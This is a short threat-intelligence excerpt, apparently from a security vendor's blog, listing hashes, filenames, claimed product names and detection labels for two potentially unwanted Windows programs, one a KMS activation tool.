**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** tmp000c3787   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg

Tag

#apple